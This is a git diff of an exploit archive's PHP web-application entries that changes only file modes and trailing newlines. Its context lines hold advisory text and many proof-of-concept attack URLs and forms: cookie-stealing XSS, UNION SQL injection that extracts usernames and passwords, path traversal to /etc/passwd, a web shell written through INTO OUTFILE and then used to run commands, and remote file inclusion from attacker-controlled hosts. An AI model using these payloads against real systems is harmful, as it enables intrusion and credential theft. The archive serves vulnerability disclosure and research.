-4,4 +4,4 @@ Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These is An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS] \ No newline at end of file +http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25156.txt b/platforms/php/webapps/25156.txt old mode 100755 new mode 100644 index 466df545e..5eb3ac19d --- a/platforms/php/webapps/25156.txt +++ b/platforms/php/webapps/25156.txt @@ -8,4 +8,4 @@ It should be noted that these issues may also be leveraged to read arbitrary fil http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00 http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00 -http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3 \ No newline at end of file +http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3 \ No newline at end of file diff --git a/platforms/php/webapps/25158.txt b/platforms/php/webapps/25158.txt old mode 100755 new mode 100644 index b34353b27..800dc7921 --- a/platforms/php/webapps/25158.txt +++ b/platforms/php/webapps/25158.txt @@ -4,4 +4,4 @@ OOApp Guestbook is reportedly affected by multiple HTML injection vulnerabilitie The attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user, other attacks are also possible. -http://www.example.com/home.php?do=del;id=%31%27%3E%0A[Javascript]%31%27%3E%0A = 1'> \ No newline at end of file +http://www.example.com/home.php?do=del;id=%31%27%3E%0A[Javascript]%31%27%3E%0A = 1'> \ No newline at end of file diff --git a/platforms/php/webapps/25160.txt b/platforms/php/webapps/25160.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25161.txt b/platforms/php/webapps/25161.txt old mode 100755 new mode 100644 index 2d52599ab..1ec688d4e --- a/platforms/php/webapps/25161.txt +++ b/platforms/php/webapps/25161.txt @@ -13,4 +13,4 @@ http://www.example.com/index.php?module=announce&ANN_user_op=submit_announcement press Save. -Go here http://www.example.com/images/announce/nst.gif.php?nst=ls -la \ No newline at end of file +Go here http://www.example.com/images/announce/nst.gif.php?nst=ls -la \ No newline at end of file diff --git a/platforms/php/webapps/25162.txt b/platforms/php/webapps/25162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25168.c b/platforms/php/webapps/25168.c old mode 100755 new mode 100644 index 7d03d1848..8d0d2f88c --- a/platforms/php/webapps/25168.c +++ b/platforms/php/webapps/25168.c @@ -92,6 +92,4 @@ printf("Cookie modified: \n\n%s\n\n", contenido); printf("The cookies file has overwriten... looks like the exploit has worked"); } else printf("\n\nThe file cookies.txt has not write permissions."); return 0; -} - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/php/webapps/25170.cpp b/platforms/php/webapps/25170.cpp old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25172.txt b/platforms/php/webapps/25172.txt old mode 100755 new mode 100644 index 03bdd73a0..63f408bae --- a/platforms/php/webapps/25172.txt +++ b/platforms/php/webapps/25172.txt @@ -14,4 +14,4 @@ http://www.example.com/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8 http://www.example.com/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_ uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE%20pn_uid=2/ -* \ No newline at end of file +* \ No newline at end of file diff --git a/platforms/php/webapps/25173.txt b/platforms/php/webapps/25173.txt old mode 100755 new mode 100644 index 2750c1dc9..ed365b4ab --- a/platforms/php/webapps/25173.txt +++ b/platforms/php/webapps/25173.txt @@ -10,4 +10,4 @@ http://www.example.com/index.php?name=Downloads&req=search&query=&show=cXIb8O3 http://www.example.com/index.php?name=Downloads&req=search&query=[Program name]&show=10%20INTO%20OUTFILE%20'/[PATH]/pnTemp/Xanthia_cache/cXIb8O3.php'/* -http://www.example.com/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd \ No newline at end of file +http://www.example.com/pnTemp/Xanthia_cache/cXIb8O3.php?cx=cat /etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/25174.txt b/platforms/php/webapps/25174.txt old mode 100755 new mode 100644 index 8ab965190..460fc56d7 --- a/platforms/php/webapps/25174.txt +++ b/platforms/php/webapps/25174.txt @@ -9,4 +9,4 @@ http://www.example.com/phpcoin/mod.php?mod=helpdesk&mode=new %22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E http://www.example.com/phpcoin/mod.php?mod=mail&mode=reset&w=user -%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E \ No newline at end of file +%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25175.txt b/platforms/php/webapps/25175.txt old mode 100755 new mode 100644 index 7dcb2c628..a2a87d5dd --- a/platforms/php/webapps/25175.txt +++ b/platforms/php/webapps/25175.txt @@ -5,4 +5,4 @@ Multiple remote input-validation vulnerabilities affect phpCOIN because the appl An attacker may leverage these issues to manipulate and view arbitrary database contents (by exploiting various SQL-injection issues) and to run arbitrary script code in the browser of an unsuspecting user (by exploiting multiple cross-site scripting vulnerabilities). http://www.example.com/phpcoin/login.php?w=user&o=login&e=u -%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E \ No newline at end of file +%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/25176.txt b/platforms/php/webapps/25176.txt old mode 100755 new mode 100644 index c69efc5ee..0bd39698e --- a/platforms/php/webapps/25176.txt +++ b/platforms/php/webapps/25176.txt @@ -4,4 +4,4 @@ PBLang is reported prone to a directory traversal vulnerability. It is reported A remote attacker may exploit this condition to reveal the contents of web server readable files. Reports indicate that this will allow a remote attacker to reveal account information for target users including the password hash. -http://www.example.com/pblang/sendpm.php?to=[username]&subj=[doesntmatter]&num=1&orig=/home/public_html/pblang/db/members/[username] \ No newline at end of file +http://www.example.com/pblang/sendpm.php?to=[username]&subj=[doesntmatter]&num=1&orig=/home/public_html/pblang/db/members/[username] \ No newline at end of file diff --git a/platforms/php/webapps/25177.txt b/platforms/php/webapps/25177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25178.txt b/platforms/php/webapps/25178.txt old mode 100755 new mode 100644 index 588a95d80..bebf8be13 --- a/platforms/php/webapps/25178.txt +++ b/platforms/php/webapps/25178.txt @@ -6,4 +6,4 @@ The attacker-supplied HTML and script code would be able to access properties of These issues are reported to affect all versions of 427BB. -http://www.example.com/profile.php?user=%3Ciframe%20src=http://www.attacker.com%20height=1%20width=1%3E%3C/iframe%3E \ No newline at end of file +http://www.example.com/profile.php?user=%3Ciframe%20src=http://www.attacker.com%20height=1%20width=1%3E%3C/iframe%3E \ No newline at end of file diff --git a/platforms/php/webapps/25179.txt b/platforms/php/webapps/25179.txt old mode 100755 new mode 100644 index 13f4d9790..8d26c8476 --- a/platforms/php/webapps/25179.txt +++ b/platforms/php/webapps/25179.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/12694/info PBLang is reported prone to a vulnerability that can allow a registered user to delete arbitrary personal messages. The vulnerability exists due to a design error leading to a lack of access controls. -http://www.example.com/pblang/delpm.php?id=[PMID]&a=[Target user name] \ No newline at end of file +http://www.example.com/pblang/delpm.php?id=[PMID]&a=[Target user name] \ No newline at end of file diff --git a/platforms/php/webapps/2518.txt b/platforms/php/webapps/2518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25183.txt b/platforms/php/webapps/25183.txt old mode 100755 new mode 100644 index a8acf5c77..9ccb398e5 --- a/platforms/php/webapps/25183.txt +++ b/platforms/php/webapps/25183.txt @@ -4,4 +4,4 @@ ProjectBB is reportedly affected by multiple cross-site scripting vulnerabilitie As a result of these vulnerabilities, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/Zip/divers.php?action=liste&liste=&desc=&pages=[XSS] \ No newline at end of file +http://www.example.com/Zip/divers.php?action=liste&liste=&desc=&pages=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/25184.txt b/platforms/php/webapps/25184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25185.txt b/platforms/php/webapps/25185.txt old mode 100755 new mode 100644 index e56a5fa81..b654e3bfe --- a/platforms/php/webapps/25185.txt +++ b/platforms/php/webapps/25185.txt @@ -6,4 +6,4 @@ As a result of this vulnerability, it is possible for a remote attacker to creat This vulnerability is reported to affect D-Forum 1.11; earlier versions may also be affected. -http://www.example.com/dforum/nav.php3?page=[code] \ No newline at end of file +http://www.example.com/dforum/nav.php3?page=[code] \ No newline at end of file diff --git a/platforms/php/webapps/25186.txt b/platforms/php/webapps/25186.txt old mode 100755 new mode 100644 index 58f6eaa48..b379e7129 --- a/platforms/php/webapps/25186.txt +++ b/platforms/php/webapps/25186.txt @@ -12,4 +12,4 @@ Gulftech Security Research has supplied the following additional proof of concep A test for vulnerability: http://www.example.com/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username%20FROM%20be_users%20WHERE%20uid=1/* Lists user names and categories: -http://www.example.com/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username,null%20FROM%20be_users%20WHERE%201/* \ No newline at end of file +http://www.example.com/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username,null%20FROM%20be_users%20WHERE%201/* \ No newline at end of file diff --git a/platforms/php/webapps/25189.txt b/platforms/php/webapps/25189.txt old mode 100755 new mode 100644 index afadd5197..f8b0ecb07 --- a/platforms/php/webapps/25189.txt +++ b/platforms/php/webapps/25189.txt @@ -4,4 +4,4 @@ Download Center Lite is reportedly affected by an arbitrary remote PHP file incl This vulnerability affects Download Center Lite version 1.5; earlier versions may also be affected. -http://www.example.com/[dir]/inc/download_center_lite.inc.php?script_root=http://[hacker]/ \ No newline at end of file +http://www.example.com/[dir]/inc/download_center_lite.inc.php?script_root=http://[hacker]/ \ No newline at end of file diff --git a/platforms/php/webapps/2519.txt b/platforms/php/webapps/2519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25193.txt b/platforms/php/webapps/25193.txt old mode 100755 new mode 100644 index 6918bd3c4..897759600 --- a/platforms/php/webapps/25193.txt +++ b/platforms/php/webapps/25193.txt @@ -5,4 +5,4 @@ phpWebLog is prone to remote file include vulnerability. This issue is due to a An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. http://www.example.com/phpWebLog/include/init.inc.php?G_PATH=http://www.example.org/ -http://www.example.com/phpWebLog/backend/addons/links/index.php?PATH=http://www.example.org/ \ No newline at end of file +http://www.example.com/phpWebLog/backend/addons/links/index.php?PATH=http://www.example.org/ \ No newline at end of file diff --git a/platforms/php/webapps/25197.txt b/platforms/php/webapps/25197.txt old mode 100755 new mode 100644 index e1ef34515..1ff88bed8 --- a/platforms/php/webapps/25197.txt +++ b/platforms/php/webapps/25197.txt @@ -6,4 +6,4 @@ An attacker can supply ASCII equivalents of arbitrary HTML and script code throu PHP-Fusion 5.00 is reportedly affected by this issue. -[IMG]&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#104&#116&#116&#112&#58&#47&#47&#119&#119&#119&#46&#97&#108&#98&#105&#110&#111&#98&#108&#97&#99&#107&#115&#104&#101&#101&#112&#46&#99&#111&#109&#47&#102&#108&#97&#115&#104&#47&#121&#111&#117&#46&#104&#116&#109&#108&#39[/IMG] \ No newline at end of file +[IMG]&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#100&#111&#99&#117&#109&#101&#110&#116&#46&#108&#111&#99&#97&#116&#105&#111&#110&#61&#39&#104&#116&#116&#112&#58&#47&#47&#119&#119&#119&#46&#97&#108&#98&#105&#110&#111&#98&#108&#97&#99&#107&#115&#104&#101&#101&#112&#46&#99&#111&#109&#47&#102&#108&#97&#115&#104&#47&#121&#111&#117&#46&#104&#116&#109&#108&#39[/IMG] \ No newline at end of file diff --git a/platforms/php/webapps/25199.txt b/platforms/php/webapps/25199.txt old mode 100755 new mode 100644 index 48bfee91c..9be0c5e2e --- a/platforms/php/webapps/25199.txt +++ b/platforms/php/webapps/25199.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th http://www.example.com/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('PersianHacker.NET-XSS')><%252FIFRAME> http://wordforlife.com/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('PersianHacker.NET-XSS')><%252FIFRAME> -http://yabbtest.spikecity.net/cgi-bin/SP2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('PersianHacker.NET-XSS')><%252FIFRAME> \ No newline at end of file +http://yabbtest.spikecity.net/cgi-bin/SP2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('PersianHacker.NET-XSS')><%252FIFRAME> \ No newline at end of file diff --git a/platforms/php/webapps/2520.txt b/platforms/php/webapps/2520.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25200.txt b/platforms/php/webapps/25200.txt old mode 100755 new mode 100644 index 512053b22..93d0f6764 --- a/platforms/php/webapps/25200.txt +++ b/platforms/php/webapps/25200.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to have arbitrary script code executed in http://www.example.com/pafiledb.php?"><script>alert();</script> http://www.example.com/pafiledb.php?action="><script>alert();</script> http://www.example.com/pafiledb.php?[something]="><script>alert();</script> -http://www.example.com/pafiledb.php?[something]=&[something]="><script>alert();</script> \ No newline at end of file +http://www.example.com/pafiledb.php?[something]=&[something]="><script>alert();</script> \ No newline at end of file diff --git a/platforms/php/webapps/25206.txt b/platforms/php/webapps/25206.txt old mode 100755 new mode 100644 index 47e206619..dcad05c25 --- a/platforms/php/webapps/25206.txt +++ b/platforms/php/webapps/25206.txt @@ -9,4 +9,4 @@ The issues reported are an HTML injection vulnerability, multiple cross-site scr An attacker may leverage these issues to execute script code in an unsuspecting user's browser, to manipulate SQL queries and to bypass authentication requirements. http://www.example.com/zorum_3_5/index.php?list="/><script>alert()</script> -http://www.example.com/zorum_3_5/index.php?method=markread&list=zorumuser&fromlist=secmenu&frommethod="/><script>alert()</script> \ No newline at end of file +http://www.example.com/zorum_3_5/index.php?method=markread&list=zorumuser&fromlist=secmenu&frommethod="/><script>alert()</script> \ No newline at end of file diff --git a/platforms/php/webapps/25208.txt b/platforms/php/webapps/25208.txt old mode 100755 new mode 100644 index a755fe2e8..3cea88321 --- a/platforms/php/webapps/25208.txt +++ b/platforms/php/webapps/25208.txt @@ -8,4 +8,4 @@ The first issue is an access validation issue that may allow attackers to manipu An attacker may leverage these issues to execute script code in an unsuspecting user's browser and to bypass authentication to execute certain application commands. -http://www.example.com/photopost/adm-photo.php?ppaction=manipulate&pid=[IMAGE ID]&dowhat=rebuildthumb&dowhat=rotateccw \ No newline at end of file +http://www.example.com/photopost/adm-photo.php?ppaction=manipulate&pid=[IMAGE ID]&dowhat=rebuildthumb&dowhat=rotateccw \ No newline at end of file diff --git a/platforms/php/webapps/2521.txt b/platforms/php/webapps/2521.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25212.txt b/platforms/php/webapps/25212.txt old mode 100755 new mode 100644 index 612b370c2..ce7313b8b --- a/platforms/php/webapps/25212.txt +++ b/platforms/php/webapps/25212.txt @@ -7,4 +7,4 @@ The SQL injection vulnerability is reported to affect the 'editpost.php' script. UBB.threads 6.0 is reported prone to this issue. It is likely that other versions are affected as well. -http://www.example.com/[path]/editpost.php?Cat=X&Board=X&Number=1'%20OR%20'a'='a \ No newline at end of file +http://www.example.com/[path]/editpost.php?Cat=X&Board=X&Number=1'%20OR%20'a'='a \ No newline at end of file diff --git a/platforms/php/webapps/25213.txt b/platforms/php/webapps/25213.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25214.txt b/platforms/php/webapps/25214.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25215.txt b/platforms/php/webapps/25215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25216.txt b/platforms/php/webapps/25216.txt old mode 100755 new mode 100644 index 4283f44e1..deb472c46 --- a/platforms/php/webapps/25216.txt +++ b/platforms/php/webapps/25216.txt @@ -4,4 +4,4 @@ Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileD Exploitation of these issues may allow for compromise of the software, session hijacking, or attacks against the underlying database. -http://www.example.com/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com></iframe>&sortby=date \ No newline at end of file +http://www.example.com/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe%20src=http://www.securityreason.com></iframe>&sortby=date \ No newline at end of file diff --git a/platforms/php/webapps/25217.html b/platforms/php/webapps/25217.html old mode 100755 new mode 100644 index 8b56b0e1a..5874a08fa --- a/platforms/php/webapps/25217.html +++ b/platforms/php/webapps/25217.html @@ -8,4 +8,4 @@ It has been demonstrated that the issue may be exploited to compromise HolaCMS. <input type="hidden" name="vote_filename" value="admin/multiuser/multiuser.php"> <input type="hidden" name="result" value="0"> <input type="submit" value="Stimme abgeben" name="button"> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/php/webapps/2522.txt b/platforms/php/webapps/2522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25220.txt b/platforms/php/webapps/25220.txt old mode 100755 new mode 100644 index 81b42e5aa..570269d83 --- a/platforms/php/webapps/25220.txt +++ b/platforms/php/webapps/25220.txt @@ -6,4 +6,4 @@ The attacker-supplied HTML and script code would be able to access properties of This issue is reported to affect paBox 2.0; earlier versions may also be vulnerable. -<INPUT type=radio CHECKED value=""><script>document.write(document.cookie);</script>" name=posticon>click me \ No newline at end of file +<INPUT type=radio CHECKED value=""><script>document.write(document.cookie);</script>" name=posticon>click me \ No newline at end of file diff --git a/platforms/php/webapps/25222.html b/platforms/php/webapps/25222.html old mode 100755 new mode 100644 index 4edfdb1cf..72bcf5af6 --- a/platforms/php/webapps/25222.html +++ b/platforms/php/webapps/25222.html @@ -12,4 +12,4 @@ HolaCMS 1.4.9-1 and prior versions are affected by this issue. <input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php"> <input type="hidden" name="result" value="0"> <input type="submit" value="Stimme abgeben" name="button"> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/php/webapps/25223.txt b/platforms/php/webapps/25223.txt old mode 100755 new mode 100644 index 3a685eb57..0c7d5b1ba --- a/platforms/php/webapps/25223.txt +++ b/platforms/php/webapps/25223.txt @@ -6,4 +6,4 @@ The attacker-supplied HTML and script code would be able to access properties of These issues are reported to affect Phorum 5.0.14; earlier versions may also be affected. -test<script language='Javascript' src='http:&#47;&#47;www.example.com&#47;test.js'>.txt \ No newline at end of file +test<script language='Javascript' src='http:&#47;&#47;www.example.com&#47;test.js'>.txt \ No newline at end of file diff --git a/platforms/php/webapps/25224.txt b/platforms/php/webapps/25224.txt old mode 100755 new mode 100644 index 447a08424..44ec8d4eb --- a/platforms/php/webapps/25224.txt +++ b/platforms/php/webapps/25224.txt @@ -4,4 +4,4 @@ SimpGB is reportedly affected by an SQL injection vulnerability. This issue is d This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. -http://www.example.com/simpgb/guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201 \ No newline at end of file +http://www.example.com/simpgb/guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201 \ No newline at end of file diff --git a/platforms/php/webapps/25225.txt b/platforms/php/webapps/25225.txt old mode 100755 new mode 100644 index 8badf13c8..d6342d2d7 --- a/platforms/php/webapps/25225.txt +++ b/platforms/php/webapps/25225.txt @@ -4,4 +4,4 @@ phpAdsNew is reportedly affected by a remote cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/[phpAdsNew]/adframe.php?refresh=example.com'>[XSS code] \ No newline at end of file +http://www.example.com/[phpAdsNew]/adframe.php?refresh=example.com'>[XSS code] \ No newline at end of file diff --git a/platforms/php/webapps/25226.txt b/platforms/php/webapps/25226.txt old mode 100755 new mode 100644 index 8506fa69c..221002618 --- a/platforms/php/webapps/25226.txt +++ b/platforms/php/webapps/25226.txt @@ -6,4 +6,4 @@ Remote attackers could potentially exploit this issue to include and execute a r This issue reportedly affects VoteBox version 2.0, previous versions might also be affected. -www.example.com/votebox.php?VoteBoxPath=http://[CMD] \ No newline at end of file +www.example.com/votebox.php?VoteBoxPath=http://[CMD] \ No newline at end of file diff --git a/platforms/php/webapps/25227.txt b/platforms/php/webapps/25227.txt old mode 100755 new mode 100644 index 0e49feab0..1328a7077 --- a/platforms/php/webapps/25227.txt +++ b/platforms/php/webapps/25227.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary server-side script co PHPOpenChat 3.0.1 and prior versions are reported prone to this issue. -http://www.example.com/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps \ No newline at end of file +http://www.example.com/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps \ No newline at end of file diff --git a/platforms/php/webapps/25228.txt b/platforms/php/webapps/25228.txt old mode 100755 new mode 100644 index 077b49573..42fdd5aa3 --- a/platforms/php/webapps/25228.txt +++ b/platforms/php/webapps/25228.txt @@ -8,4 +8,4 @@ PHPOpenChat 3.0.1 and prior versions are reported prone to this issue. http://www.example.com/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps -http://www.example.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps \ No newline at end of file +http://www.example.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps \ No newline at end of file diff --git a/platforms/php/webapps/25229.txt b/platforms/php/webapps/25229.txt old mode 100755 new mode 100644 index 950092338..4dd09d26c --- a/platforms/php/webapps/25229.txt +++ b/platforms/php/webapps/25229.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary server-side script co PHPOpenChat 3.0.1 and prior versions are reported prone to this issue. -http://www.example.com/phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps \ No newline at end of file +http://www.example.com/phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps \ No newline at end of file diff --git a/platforms/php/webapps/25230.txt b/platforms/php/webapps/25230.txt old mode 100755 new mode 100644 index b230e80bc..1db557c26 --- a/platforms/php/webapps/25230.txt +++ b/platforms/php/webapps/25230.txt @@ -6,4 +6,4 @@ An attacker could also exploit this issue to control how the site is rendered to PunBB 1.2.3 is reported vulnerable, however, other versions may be affected as well. -example@"/><script>alert()</script>.com \ No newline at end of file +example@"/><script>alert()</script>.com \ No newline at end of file diff --git a/platforms/php/webapps/25232.txt b/platforms/php/webapps/25232.txt old mode 100755 new mode 100644 index d534f0429..9da014794 --- a/platforms/php/webapps/25232.txt +++ b/platforms/php/webapps/25232.txt @@ -4,4 +4,4 @@ mcNews is reportedly affected by a remote file include vulnerability. This issue This issue is reported to affect mcNews versions 1.3 and prior. -http://www.example.com/path/to/mcnews/admin/install.php?l=http://www.example.com \ No newline at end of file +http://www.example.com/path/to/mcnews/admin/install.php?l=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/25235.txt b/platforms/php/webapps/25235.txt old mode 100755 new mode 100644 index 09b1959c4..fb479fd4f --- a/platforms/php/webapps/25235.txt +++ b/platforms/php/webapps/25235.txt @@ -6,4 +6,4 @@ Because of this, a malicious user may influence database queries in order to vie Subdreamer Light is reported to be affected by this issue. All versions of Subdreamer Light are considered to be vulnerable at the moment. -http://www.example.com/index.php?categoryid=3&p17_sectionid=1&p17_imageid=[SQL code] \ No newline at end of file +http://www.example.com/index.php?categoryid=3&p17_sectionid=1&p17_imageid=[SQL code] \ No newline at end of file diff --git a/platforms/php/webapps/25236.html b/platforms/php/webapps/25236.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25237.txt b/platforms/php/webapps/25237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25239.txt b/platforms/php/webapps/25239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25240.txt b/platforms/php/webapps/25240.txt old mode 100755 new mode 100644 index 3bb59c588..1c30d57aa --- a/platforms/php/webapps/25240.txt +++ b/platforms/php/webapps/25240.txt @@ -6,4 +6,4 @@ Multiple SQL injection vulnerabilities have been reported and a cross-site scrip An attacker may leverage these issues to manipulate and view arbitrary database contents by exploiting the SQL injection issues, and to have arbitrary script code executed in the browser of an unsuspecting user by exploiting the cross-site scripting vulnerabilities. -http://www.example.com/register.php?action=confirm&login='or 1=1 into outfile '/var/www/html/cf_users_with_magic_quotes_on.txt \ No newline at end of file +http://www.example.com/register.php?action=confirm&login='or 1=1 into outfile '/var/www/html/cf_users_with_magic_quotes_on.txt \ No newline at end of file diff --git a/platforms/php/webapps/25241.html b/platforms/php/webapps/25241.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25242.txt b/platforms/php/webapps/25242.txt old mode 100755 new mode 100644 index 8bd64c540..476559bff --- a/platforms/php/webapps/25242.txt +++ b/platforms/php/webapps/25242.txt @@ -4,4 +4,4 @@ Ciamos is reported prone to a file disclosure vulnerability. The full scope of t A remote attacker may exploit this vulnerability to reveal files that contain potentially sensitive information. Information that is harvested in this manner may then be used to aid in further attacks against the software and the computer that is hosting the software. -http://www.example.com/ciamosinstalation/class/debug/highlight.php?file=ciamosinstallationpath\mainfile.php&line=151#151 \ No newline at end of file +http://www.example.com/ciamosinstalation/class/debug/highlight.php?file=ciamosinstallationpath\mainfile.php&line=151#151 \ No newline at end of file diff --git a/platforms/php/webapps/25243.txt b/platforms/php/webapps/25243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25244.txt b/platforms/php/webapps/25244.txt old mode 100755 new mode 100644 index ed5fa3e29..3cac6144f --- a/platforms/php/webapps/25244.txt +++ b/platforms/php/webapps/25244.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary server-side script code CzarNews 1.13b is reported vulnerable; other versions may be affected as well. -http://www.example.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.example.org/cn_config.php \ No newline at end of file +http://www.example.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.example.org/cn_config.php \ No newline at end of file diff --git a/platforms/php/webapps/25245.txt b/platforms/php/webapps/25245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25247.txt b/platforms/php/webapps/25247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25248.txt b/platforms/php/webapps/25248.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25249.txt b/platforms/php/webapps/25249.txt old mode 100755 new mode 100644 index 2ee4829a4..e7bed3d69 --- a/platforms/php/webapps/25249.txt +++ b/platforms/php/webapps/25249.txt @@ -120,5 +120,4 @@ - Credits: - Ahmed Aboul-Ela - Information Security Consultant @ Starware Group - \ No newline at end of file + Ahmed Aboul-Ela - Information Security Consultant @ Starware Group \ No newline at end of file diff --git a/platforms/php/webapps/25250.txt b/platforms/php/webapps/25250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/25257.txt b/platforms/php/webapps/25257.txt old mode 100755 new mode 100644 index bb63e037e..cd879a506 --- a/platforms/php/webapps/25257.txt +++ b/platforms/php/webapps/25257.txt @@ -16,4 +16,4 @@ http://www.example.com/index.php?_a=troubleshooter&_c=[INT][XSS] http://www.example.com/index.php?_a=knowledgebase&_j=subcat&_i=[INT][XSS] -where [INT] is a valid integer value. \ No newline at end of file +where [INT] is a valid integer value. \ No newline at end of file diff --git a/platforms/php/webapps/25258.txt b/platforms/php/webapps/25258.txt old mode 100755 new mode 100644 index 47abedc8b..2279d8fbb --- a/platforms/php/webapps/25258.txt +++ b/platforms/php/webapps/25258.txt @@ -7,4 +7,4 @@ A remote attacker may exploit this vulnerability to influence or misrepresent ho This issue was reported to affect Phorum version 5.0.14a; other versions might also be affected. 